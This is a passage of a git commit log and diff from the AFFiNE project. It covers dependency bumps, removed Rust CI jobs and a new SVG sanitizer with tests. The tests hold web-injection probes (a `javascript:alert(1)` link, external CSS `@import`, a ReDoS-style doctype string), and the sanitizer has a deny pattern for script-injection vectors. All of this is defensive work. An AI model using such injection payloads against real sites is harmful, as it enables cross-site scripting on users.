
  // New output
  new (foo())`bar`();
  new (foo()?.bar)();
  ```

- Fix renaming of nested `var` declarations
([#&#8203;4471](https://redirect.github.com/evanw/esbuild/issues/4471))

This release fixes a bug where `var` declarations in nested scopes that
are hoisted up to module scope were not correctly being renamed during
bundling. That could previously lead to name collisions when
minification was disabled, which could potentially cause a behavior
change. The bug has been fixed so that these hoisted declarations are
now considered to be module-level symbols during the name collision
avoidance pass.

- Emit `var` instead of `const` for certain TypeScript-only constructs
for ES5
([#&#8203;4448](https://redirect.github.com/evanw/esbuild/issues/4448))

While esbuild doesn't generally support converting `const` to `var` for
ES5 due to nested scoping rules (which is currently a build-time error),
esbuild previously incorrectly converted TypeScript-only `import`
assignment constructs into a `const` declaration even when targeting
ES5. With this release, esbuild will now use `var` for this case
instead:

  ```js
  // Original code
  import x = require('y')

  // Old output (with --target=es5)
  const x = require("y");

  // New output (with --target=es5)
  var x = require("y");
  ```

### [`v0.28.0`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.7...v0.28.0)

### [`v0.27.7`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.5...v0.27.7)

### [`v0.27.5`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.4...v0.27.5)

### [`v0.27.4`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.3...v0.27.4)

### [`v0.27.3`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.2...v0.27.3)

### [`v0.27.2`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.1...v0.27.2)

### [`v0.27.1`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.0...v0.27.1)

### [`v0.27.0`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.26.0...v0.27.0)

### [`v0.26.0`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.25.12...v0.26.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-18 17:41:44 +08:00
DarkSky 154d9e975d fix: deps & config (#15126) 2026-06-18 14:41:48 +08:00
renovate[bot] 24e07f73bb chore: bump up capacitor-plugin-app-tracking-transparency version to v3 (#15079)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[capacitor-plugin-app-tracking-transparency](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency)
| [`^2.0.5` →
`^3.0.0`](https://renovatebot.com/diffs/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/capacitor-plugin-app-tracking-transparency/3.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0?slim=true)
|

---

### Release Notes

<details>
<summary>mahnuh/capacitor-plugin-app-tracking-transparency
(capacitor-plugin-app-tracking-transparency)</summary>

###
[`v3.0.0`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/releases/tag/v3.0.0)

[Compare
Source](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/compare/v2.0.5...v3.0.0)

- Add support for Swift Package Manager
([#&#8203;29](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/issues/29))
[`40051d6`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/40051d6)
- Update README.md
[`d8c4d27`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/d8c4d27)

***

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-06-18 13:00:42 +08:00
DarkSky d500e472f0 chore: bump deps (#15124) 2026-06-18 12:55:18 +08:00
DarkSky 13d9fe506e feat(native): cleanup vendored deps (#15119)
#### PR Dependency Tree


* **PR #15119** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Breaking Changes**
* Removed major Rust public APIs related to document/CRDT encoding,
synchronization, and document loading from the affected packages.
* **Chores**
* Migrated internal dependency usage to published crates and trimmed the
Rust workspace/feature surface.
* **CI/CD**
* Simplified the Rust CI pipeline by removing advanced testing jobs and
updating job dependencies.
* **Dev/Test/Bench**
* Removed associated benchmark and fuzzing artifacts and related
fixture/test utilities.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 02:55:30 +08:00
DarkSky 1256d66938 fix(server): sync permission check (#15123)
fix #15121



#### PR Dependency Tree


* **PR #15123** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Security Improvements**
* Enforced document-level `Doc.Read`/`Doc.Update` checks for key sync
websocket operations, including filtering workspace doc timestamp
results to only readable documents.
* Improved remote permission handling: once a remote denies access,
syncing stops for the affected document and retry behavior is
suppressed.
* **Improvements**
* `delete-doc` now relies on server acknowledgment and returns an
explicit `{ success: true }`.
* Websocket acknowledgment errors are now normalized for consistent
error details.
* **Tests**
* Expanded permission-denied and websocket error-handling coverage,
including timestamp filtering and no-retry behavior after permission
denial.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 02:43:25 +08:00
167 changed files with 3152 additions and 18274 deletions
-1
View File
@@ -31,7 +31,6 @@
"groupSlug": "all-minor-patch",
"matchUpdateTypes": ["minor", "patch"],
"matchManagers": ["npm"],
"matchPackageNames": ["*"],
"excludePackagePatterns": ["^@blocksuite/", "^oxlint$"]
},
{
-96
View File
@@ -948,99 +948,6 @@ jobs:
name: affine
fail_ci_if_error: false
miri:
name: miri code check
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
runs-on: ubuntu-latest
needs:
- rust-test-filter
env:
RUST_BACKTRACE: full
CARGO_TERM_COLOR: always
MIRIFLAGS: -Zmiri-backtrace=full -Zmiri-tree-borrows
steps:
- uses: actions/checkout@v6
- name: Setup Rust
uses: dtolnay/rust-toolchain@stable
with:
toolchain: nightly
components: miri
- name: Install latest nextest release
uses: taiki-e/install-action@v2
with:
tool: nextest@0.9.98
- name: Miri Code Check
continue-on-error: true
run: |
cargo +nightly miri nextest run -p y-octo -j4
loom:
name: loom thread test
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
runs-on: ubuntu-latest
needs:
- rust-test-filter
env:
RUSTFLAGS: --cfg loom
RUST_BACKTRACE: full
CARGO_TERM_COLOR: always
steps:
- uses: actions/checkout@v6
- name: Setup Rust
uses: dtolnay/rust-toolchain@stable
with:
toolchain: stable
- name: Install latest nextest release
uses: taiki-e/install-action@v2
with:
tool: nextest@0.9.98
- name: Loom Thread Test
run: |
cargo nextest run -p y-octo --lib
fuzzing:
name: fuzzing
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
runs-on: ubuntu-latest
needs:
- rust-test-filter
env:
CARGO_TERM_COLOR: always
steps:
- uses: actions/checkout@v6
- name: Setup Rust
uses: dtolnay/rust-toolchain@stable
with:
toolchain: nightly
- name: fuzzing
working-directory: ./packages/common/y-octo/utils
run: |
cargo install cargo-fuzz
cargo +nightly fuzz run apply_update -- -max_total_time=30
cargo +nightly fuzz run codec_doc_any_struct -- -max_total_time=30
cargo +nightly fuzz run codec_doc_any -- -max_total_time=30
cargo +nightly fuzz run decode_bytes -- -max_total_time=30
cargo +nightly fuzz run i32_decode -- -max_total_time=30
cargo +nightly fuzz run i32_encode -- -max_total_time=30
cargo +nightly fuzz run ins_del_text -- -max_total_time=30
cargo +nightly fuzz run sync_message -- -max_total_time=30
cargo +nightly fuzz run u64_decode -- -max_total_time=30
cargo +nightly fuzz run u64_encode -- -max_total_time=30
cargo +nightly fuzz run apply_update -- -max_total_time=30
- name: upload fuzz artifacts
if: ${{ failure() }}
uses: actions/upload-artifact@v4
with:
name: fuzz-artifact
path: packages/common/y-octo/utils/fuzz/artifacts/**/*
rust-test:
name: Run native tests
if: ${{ needs.rust-test-filter.outputs.run-rust == 'true' }}
@@ -1498,9 +1405,6 @@ jobs:
- build-server-native
- build-electron-renderer
- native-unit-test
- miri
- loom
- fuzzing
- server-test
- server-e2e-test
- rust-test
Generated
+452 -501
View File
File diff suppressed because it is too large Load Diff
+2 -23
View File
@@ -2,8 +2,6 @@
members = [
"./packages/backend/native",
"./packages/common/native",
"./packages/common/y-octo/core",
"./packages/common/y-octo/utils",
"./packages/frontend/mobile-native",
"./packages/frontend/native",
"./packages/frontend/native/nbstore",
@@ -23,7 +21,6 @@ resolver = "3"
anyhow = "1"
arbitrary = { version = "1.3", features = ["derive"] }
assert-json-diff = "2.0"
async-lock = { version = "3.4.0", features = ["loom"] }
base64-simd = "0.8"
bitvec = "1.0"
block2 = "0.6"
@@ -37,7 +34,7 @@ resolver = "3"
criterion2 = { version = "3", default-features = false }
crossbeam-channel = "0.5"
dispatch2 = "0.3"
docx-parser = { git = "https://github.com/toeverything/docx-parser", rev = "380beea" }
doc_extractor = "0.1.0"
dotenvy = "0.15"
file-format = { version = "0.28", features = ["reader"] }
hex = "0.4"
@@ -58,7 +55,6 @@ resolver = "3"
llm_adapter = { version = "0.2", default-features = false }
llm_runtime = { version = "0.2", default-features = false }
log = "0.4"
loom = { version = "0.7", features = ["checkpoint"] }
lru = "0.16"
matroska = "0.30"
memory-indexer = "0.3.1"
@@ -84,8 +80,6 @@ resolver = "3"
ordered-float = "5"
p256 = { version = "0.13", features = ["ecdsa", "pem"] }
parking_lot = "0.12"
path-ext = "0.1.2"
pdf-extract = { git = "https://github.com/toeverything/pdf-extract", branch = "darksky/improve-font-decoding" }
phf = { version = "0.11", features = ["macros"] }
proptest = "1.3"
proptest-derive = "0.5"
@@ -94,7 +88,6 @@ resolver = "3"
rand_chacha = "0.9"
rand_distr = "0.5"
rayon = "1.10"
readability = { version = "0.3.0", default-features = false }
regex = "1.10"
rubato = "0.16"
safefetch = "0.1.0"
@@ -112,24 +105,10 @@ resolver = "3"
"runtime-tokio",
"sqlite",
] }
strum_macros = "0.27.0"
symphonia = { version = "0.5", features = ["all", "opt-simd"] }
text-splitter = "0.27"
thiserror = "2"
tiktoken-rs = "0.7"
tokio = "1.45"
tree-sitter = { version = "0.25" }
tree-sitter-c = { version = "0.24" }
tree-sitter-c-sharp = { version = "0.23" }
tree-sitter-cpp = { version = "0.23" }
tree-sitter-go = { version = "0.23" }
tree-sitter-java = { version = "0.23" }
tree-sitter-javascript = { version = "0.23" }
tree-sitter-kotlin-ng = { version = "1.1" }
tree-sitter-python = { version = "0.23" }
tree-sitter-rust = { version = "0.24" }
tree-sitter-scala = { version = "0.24" }
tree-sitter-typescript = { version = "0.23" }
typst = "0.14.2"
typst-as-lib = { version = "0.15.4", default-features = false, features = [
"packages",
@@ -155,7 +134,7 @@ resolver = "3"
"Win32_UI_Shell_PropertiesSystem",
] }
windows-core = { version = "0.61" }
y-octo = { path = "./packages/common/y-octo/core" }
y-octo = "0.0.3"
y-sync = { version = "0.4" }
yrs = "0.23.0"
+1 -1
View File
@@ -43,7 +43,7 @@
"@blocksuite/store": "workspace:*",
"@preact/signals-core": "^1.8.0",
"@types/lodash-es": "^4.17.12",
"dompurify": "^3.3.0",
"dompurify": "^3.4.11",
"html2canvas": "^1.4.1",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
+2 -1
View File
@@ -23,7 +23,7 @@
"@types/lodash-es": "^4.17.12",
"@types/mdast": "^4.0.4",
"bytes": "^3.1.2",
"dompurify": "^3.3.0",
"dompurify": "^3.4.11",
"fractional-indexing": "^3.2.0",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
@@ -46,6 +46,7 @@
"remark-parse": "^11.0.0",
"remark-stringify": "^11.0.0",
"rxjs": "^7.8.2",
"tldts": "^7.0.19",
"ts-pattern": "^5.1.0",
"unified": "^11.0.5",
"unist-util-visit": "^5.0.0",
@@ -0,0 +1,191 @@
/**
* @vitest-environment happy-dom
*/
import { describe, expect, test } from 'vitest';
import { sanitizeSvg } from '../../utils/svg.js';
type HappyDOMWindow = Window & {
happyDOM: {
setURL: (url: string) => void;
};
};
function setLocation(url: string) {
(window as unknown as HappyDOMWindow).happyDOM.setURL(url);
}
function svgDataUrl(svg: string) {
const bytes = new TextEncoder().encode(svg);
let binary = '';
bytes.forEach(byte => {
binary += String.fromCharCode(byte);
});
return `data:image/svg+xml;base64,${btoa(binary)}`;
}
function decodeSvgDataUrl(dataUrl: string) {
const base64 = dataUrl.split(',')[1];
return new TextDecoder().decode(
Uint8Array.from(atob(base64), char => char.charCodeAt(0))
);
}
describe('sanitizeSvg', () => {
test('wraps DOMPurify svg fragments back into an svg root', () => {
const sanitized = sanitizeSvg(
'<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"><rect width="100" height="100"></rect></svg>'
);
expect(sanitized).toContain('<svg');
expect(sanitized).toContain('width="100"');
expect(sanitized).toContain('<rect');
});
test('accepts svg documents with xml and doctype prefixes', () => {
const sanitized = sanitizeSvg(`<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<rect width="100" height="100"></rect>
</svg>`);
expect(sanitized).toContain('<svg');
expect(sanitized).toContain('width="100"');
expect(sanitized).toContain('<rect');
expect(sanitized).not.toContain('<!DOCTYPE');
});
test('rejects non-svg roots', () => {
expect(sanitizeSvg('<div><svg></svg></div>')).toBe('');
});
test('rejects malformed doctype prefixes without regexp backtracking', () => {
const maliciousPrefix = '<!doctype' + '?><!doctype'.repeat(10_000);
expect(sanitizeSvg(`${maliciousPrefix}<div></div>`)).toBe('');
});
test('keeps internal glyph references and safe image data urls', () => {
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<defs><path id="glyph-a" d="M0 0h10v10z"></path></defs>
<use href="#glyph-a"></use>
<use xlink:href="#glyph-a"></use>
<a xlink:href="https://typst.app/docs/tutorial"><path d="M0 0h10v10z"></path></a>
<image href="data:image/png;base64,AAAA" width="10" height="10"></image>
</svg>
`);
expect(sanitized).toContain('href="#glyph-a"');
expect(sanitized).toContain('xlink:href="#glyph-a"');
expect(sanitized).toContain('xlink:href="https://typst.app/docs/tutorial"');
expect(sanitized).toContain('data:image/png;base64,AAAA');
});
test('removes external glyph references and unsafe css', () => {
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<style>@import "https://example.com/style.css"; .a { fill: #000; }</style>
<use href="https://example.com/glyph.svg#x"></use>
<use xlink:href="https://example.com/glyph.svg#x"></use>
<a xlink:href="javascript:alert(1)"><path d="M0 0h10v10z"></path></a>
<image href="https://example.com/image.png" width="10" height="10"></image>
<path style="fill: url(https://example.com/pattern.svg#x)" d="M0 0h10v10z"></path>
</svg>
`);
expect(sanitized).not.toContain('https://example.com');
expect(sanitized).not.toContain('javascript:');
expect(sanitized).not.toContain('@import');
expect(sanitized).not.toContain('url(');
});
test('removes links sharing the current registrable domain', () => {
setLocation('https://sub.example.co.uk/workspace');
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<a xlink:href="https://sub.example.co.uk/docs"><path d="M0 0h10v10z"></path></a>
<a href="https://other.example.co.uk/docs"><path d="M0 0h10v10z"></path></a>
<a xlink:href="https://example.com/docs"><path d="M0 0h10v10z"></path></a>
</svg>
`);
expect(sanitized).not.toContain('https://sub.example.co.uk/docs');
expect(sanitized).not.toContain('https://other.example.co.uk/docs');
expect(sanitized).toContain('https://example.com/docs');
});
test('keeps private suffix sibling domains separate', () => {
setLocation('https://foo.github.io/workspace');
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<a xlink:href="https://foo.github.io/docs"><path d="M0 0h10v10z"></path></a>
<a href="https://bar.github.io/docs"><path d="M0 0h10v10z"></path></a>
</svg>
`);
expect(sanitized).not.toContain('https://foo.github.io/docs');
expect(sanitized).toContain('https://bar.github.io/docs');
});
test('handles local hostnames by exact hostname', () => {
setLocation('http://localhost:3000/workspace');
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<a xlink:href="http://localhost:8080/docs"><path d="M0 0h10v10z"></path></a>
<a href="http://share.localhost/docs"><path d="M0 0h10v10z"></path></a>
<a href="http://127.0.0.1/docs"><path d="M0 0h10v10z"></path></a>
</svg>
`);
expect(sanitized).not.toContain('http://localhost:8080/docs');
expect(sanitized).toContain('http://share.localhost/docs');
expect(sanitized).toContain('http://127.0.0.1/docs');
});
test('recursively sanitizes svg images', () => {
const nestedSvg = svgDataUrl(
'<svg xmlns="http://www.w3.org/2000/svg"><defs><path id="glyph-a" d="M0 0h10v10z"></path></defs><use href="#glyph-a"></use><use href="https://example.com/glyph.svg#x"></use></svg>'
);
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<image href="${nestedSvg}" width="10" height="10"></image>
</svg>
`);
const sanitizedImageHref = sanitized.match(/href="([^"]+)"/)?.[1];
expect(sanitizedImageHref).toMatch(/^data:image\/svg\+xml;base64,/);
expect(decodeSvgDataUrl(sanitizedImageHref ?? '')).toContain('<svg');
expect(decodeSvgDataUrl(sanitizedImageHref ?? '')).toContain('#glyph-a');
expect(decodeSvgDataUrl(sanitizedImageHref ?? '')).not.toContain(
'https://example.com'
);
});
test('removes svg images nested deeper than two levels', () => {
const thirdLevelSvg = svgDataUrl(
'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"></rect></svg>'
);
const secondLevelSvg = svgDataUrl(
`<svg xmlns="http://www.w3.org/2000/svg"><image href="${thirdLevelSvg}"></image></svg>`
);
const firstLevelSvg = svgDataUrl(
`<svg xmlns="http://www.w3.org/2000/svg"><image href="${secondLevelSvg}"></image></svg>`
);
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<image href="${firstLevelSvg}"></image>
</svg>
`);
const firstLevelHref = sanitized.match(/href="([^"]+)"/)?.[1];
const firstLevelSanitizedSvg = decodeSvgDataUrl(firstLevelHref ?? '');
const secondLevelHref = firstLevelSanitizedSvg.match(/href="([^"]+)"/)?.[1];
const secondLevelSanitizedSvg = decodeSvgDataUrl(secondLevelHref ?? '');
expect(firstLevelSanitizedSvg).toContain('<image');
expect(secondLevelSanitizedSvg).not.toContain('<image');
});
});
@@ -20,7 +20,6 @@ import {
type ToSliceSnapshotPayload,
type Transformer,
} from '@blocksuite/store';
import DOMPurify from 'dompurify';
import pdfMake from 'pdfmake/build/pdfmake';
import type {
Content,
@@ -29,6 +28,7 @@ import type {
} from 'pdfmake/interfaces';
import { getNumberPrefix } from '../../utils';
import { sanitizeSvg } from '../../utils/svg.js';
import { resolveCssVariable } from './css-utils.js';
import { extractTextWithInline } from './delta-converter.js';
import {
@@ -746,9 +746,8 @@ export class PdfAdapter extends BaseAdapter<PdfAdapterFile> {
const trimmedText = text.trim();
if (trimmedText.startsWith('<svg')) {
const svgContent = DOMPurify.sanitize(trimmedText, {
USE_PROFILES: { svg: true },
});
const svgContent = sanitizeSvg(trimmedText);
if (!svgContent) throw new Error('Invalid SVG image asset');
const svgDimensions = extractSvgDimensions(svgContent);
const dimensions = calculateImageDimensions(
blockWidth,
@@ -23,6 +23,7 @@ export * from './reordering';
export * from './safe-html';
export * from './signal';
export * from './string';
export * from './svg';
export * from './title';
export * from './url';
export * from './virtual-padding';
+294
View File
@@ -0,0 +1,294 @@
import type { Config } from 'dompurify';
import DOMPurify from 'dompurify';
import { parse } from 'tldts';
type SanitizeSvgOptions = {
svg?: Config;
foreignObjectHtml?: Config;
};
const MAX_NESTED_SVG_IMAGE_DEPTH = 2;
const DEFAULT_SVG_SANITIZE_CONFIG: Config = {
USE_PROFILES: { svg: true },
ADD_TAGS: ['use'],
ADD_ATTR: ['href', 'xlink:href', 'class', 'style', 'id'],
};
const DEFAULT_FOREIGN_OBJECT_HTML_SANITIZE_CONFIG: Config = {
USE_PROFILES: { html: true },
};
const SAFE_LINK_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);
const SVG_DATA_URL_PATTERN =
/^data:image\/svg\+xml(?:;charset=[^;,]+)?(?<base64>;base64)?,(?<data>[\s\S]*)$/i;
const SAFE_IMAGE_DATA_URL_PATTERN =
/^data:image\/(?:png|jpe?g|gif|webp|svg\+xml);base64,[a-z0-9+/=]+$/i;
const UNSAFE_CSS_PATTERN =
/(?:url\s*\(|@import|javascript\s*:|expression\s*\(|-moz-binding)/i;
const SVG_ROOT_ATTRIBUTES = [
'class',
'data-height',
'data-width',
'height',
'preserveAspectRatio',
'viewBox',
'width',
'xmlns',
'xmlns:h5',
'xmlns:xlink',
];
function getAttribute(element: Element, attribute: string) {
return (
element.getAttribute(attribute) ??
element.getAttribute(attribute.toLowerCase())
);
}
function getSvgSanitizeConfig(options?: SanitizeSvgOptions) {
return {
...DEFAULT_SVG_SANITIZE_CONFIG,
...options?.svg,
};
}
function getForeignObjectHtmlSanitizeConfig(options?: SanitizeSvgOptions) {
return {
...DEFAULT_FOREIGN_OBJECT_HTML_SANITIZE_CONFIG,
...options?.foreignObjectHtml,
};
}
function isXmlWhitespace(char: string) {
return (
char === ' ' ||
char === '\n' ||
char === '\r' ||
char === '\t' ||
char === '\f'
);
}
function skipXmlWhitespace(value: string, index: number) {
while (index < value.length && isXmlWhitespace(value[index])) {
index++;
}
return index;
}
function startsWithIgnoreCase(value: string, search: string, index: number) {
return value.slice(index, index + search.length).toLowerCase() === search;
}
function getSvgRootStartIndex(value: string) {
let index = skipXmlWhitespace(value, 0);
if (startsWithIgnoreCase(value, '<?xml', index)) {
const declarationEnd = value.indexOf('?>', index + 5);
if (declarationEnd === -1) return -1;
index = skipXmlWhitespace(value, declarationEnd + 2);
}
if (startsWithIgnoreCase(value, '<!doctype', index)) {
const doctypeEnd = value.indexOf('>', index + 9);
if (doctypeEnd === -1) return -1;
index = skipXmlWhitespace(value, doctypeEnd + 1);
}
if (!startsWithIgnoreCase(value, '<svg', index)) return -1;
const next = value[index + 4];
return next === '>' || (next !== undefined && isXmlWhitespace(next))
? index
: -1;
}
function hasSvgRoot(value: string) {
return getSvgRootStartIndex(value) !== -1;
}
function getOriginalSvgRoot(svg: string, parser: DOMParser) {
const root = parser.parseFromString(svg, 'image/svg+xml').documentElement;
if (root?.tagName.toLowerCase() === 'svg') {
return root;
}
if (!hasSvgRoot(svg)) {
return null;
}
return parser.parseFromString(svg, 'text/html').querySelector('svg');
}
function ensureSvgRoot(
originalRoot: Element | null,
sanitized: string,
parser: DOMParser
) {
if (hasSvgRoot(sanitized)) {
const sanitizedDoc = parser.parseFromString(sanitized, 'image/svg+xml');
const sanitizedRoot = sanitizedDoc.documentElement;
return sanitizedRoot?.tagName.toLowerCase() === 'svg'
? sanitizedRoot
: null;
}
const svgDoc = parser.parseFromString('<svg></svg>', 'image/svg+xml');
const svgRoot = svgDoc.documentElement;
SVG_ROOT_ATTRIBUTES.forEach(attribute => {
const value = originalRoot ? getAttribute(originalRoot, attribute) : null;
if (value) {
svgRoot.setAttribute(attribute, value);
}
});
svgRoot.innerHTML = sanitized;
return svgRoot;
}
function sanitizeForeignObjects(
root: ParentNode,
options?: SanitizeSvgOptions
) {
root.querySelectorAll('foreignObject, foreignobject').forEach(element => {
element.innerHTML = DOMPurify.sanitize(
element.innerHTML,
getForeignObjectHtmlSanitizeConfig(options)
);
});
}
function getSiteDomain(hostname: string) {
return (
parse(hostname, { allowPrivateDomains: true }).domain ??
hostname.toLowerCase()
);
}
function isSameSiteDomain(url: URL) {
if (typeof location === 'undefined') return false;
return getSiteDomain(url.hostname) === getSiteDomain(location.hostname);
}
function isSafeLinkUrl(value: string) {
try {
const url = new URL(value);
return SAFE_LINK_PROTOCOLS.has(url.protocol) && !isSameSiteDomain(url);
} catch {
return false;
}
}
function isSafeHref(element: Element, value: string) {
if (value.startsWith('#')) return true;
const tagName = element.tagName.toLowerCase();
if (tagName === 'use') return false;
if (tagName === 'image') return SAFE_IMAGE_DATA_URL_PATTERN.test(value);
if (tagName === 'a') return isSafeLinkUrl(value);
return false;
}
function decodeSvgDataUrl(value: string) {
const groups = value.match(SVG_DATA_URL_PATTERN)?.groups;
if (!groups) return null;
try {
if (groups.base64) {
return new TextDecoder().decode(
Uint8Array.from(atob(groups.data), char => char.charCodeAt(0))
);
}
return decodeURIComponent(groups.data);
} catch {
return null;
}
}
function encodeSvgDataUrl(svg: string) {
const binary = Array.from(new TextEncoder().encode(svg), byte =>
String.fromCharCode(byte)
).join('');
return `data:image/svg+xml;base64,${btoa(binary)}`;
}
function getHrefAttributes(element: Element) {
return Array.from(element.attributes).filter(
attribute => attribute.name === 'href' || attribute.name === 'xlink:href'
);
}
function tightenSvgTree(
root: ParentNode,
options: SanitizeSvgOptions | undefined,
depth: number
) {
root.querySelectorAll('*').forEach(element => {
getHrefAttributes(element).forEach(attribute => {
const href = attribute.value.trim();
const nestedSvg =
element.tagName.toLowerCase() === 'image'
? decodeSvgDataUrl(href)
: null;
if (nestedSvg !== null) {
if (depth < MAX_NESTED_SVG_IMAGE_DEPTH) {
const sanitized = sanitizeSvgWithDepth(nestedSvg, options, depth + 1);
if (sanitized) {
element.setAttribute(attribute.name, encodeSvgDataUrl(sanitized));
return;
}
}
element.remove();
} else if (!isSafeHref(element, href)) {
element.removeAttribute(attribute.name);
}
});
const style = element.getAttribute('style');
if (style && UNSAFE_CSS_PATTERN.test(style)) {
element.removeAttribute('style');
}
if (
element.tagName.toLowerCase() === 'style' &&
UNSAFE_CSS_PATTERN.test(element.textContent ?? '')
) {
element.remove();
}
});
}
export function sanitizeSvg(svg: string, options?: SanitizeSvgOptions): string {
return sanitizeSvgWithDepth(svg, options, 0);
}
function sanitizeSvgWithDepth(
svg: string,
options: SanitizeSvgOptions | undefined,
depth: number
): string {
const svgConfig = getSvgSanitizeConfig(options);
if (
typeof DOMParser === 'undefined' ||
typeof XMLSerializer === 'undefined'
) {
const sanitized = DOMPurify.sanitize(svg, svgConfig);
if (typeof sanitized !== 'string' || !hasSvgRoot(sanitized)) {
return '';
}
return sanitized.trim();
}
const parser = new DOMParser();
const originalRoot = getOriginalSvgRoot(svg, parser);
if (!originalRoot) return '';
const sanitized = DOMPurify.sanitize(svg, svgConfig);
if (typeof sanitized !== 'string') return '';
const sanitizedRoot = ensureSvgRoot(originalRoot, sanitized, parser);
if (!sanitizedRoot) return '';
sanitizeForeignObjects(sanitizedRoot, options);
tightenSvgTree(sanitizedRoot, options, depth);
return new XMLSerializer().serializeToString(sanitizedRoot).trim();
}
@@ -24,7 +24,7 @@
"@toeverything/theme": "^1.1.23",
"@types/lodash-es": "^4.17.12",
"fflate": "^0.8.2",
"js-yaml": "^4.1.1",
"js-yaml": "^4.2.0",
"jszip": "^3.10.1",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
+1 -1
View File
@@ -19,7 +19,7 @@
"@preact/signals-core": "^1.8.0",
"@types/hast": "^3.0.4",
"@types/lodash-es": "^4.17.12",
"dompurify": "^3.3.0",
"dompurify": "^3.4.11",
"fractional-indexing": "^3.2.0",
"lib0": "^0.2.114",
"lit": "^3.2.0",
+1 -1
View File
@@ -37,7 +37,7 @@
"@vanilla-extract/vite-plugin": "^5.0.0",
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
"vite": "^7.2.7",
"vite": "^7.3.5",
"vite-plugin-wasm": "^3.5.0",
"vitest": "^4.1.8"
},
+1 -1
View File
@@ -34,7 +34,7 @@
"@types/micromatch": "^4.0.9",
"@vanilla-extract/vite-plugin": "^5.0.0",
"magic-string": "^0.30.21",
"vite": "^7.2.7",
"vite": "^7.3.5",
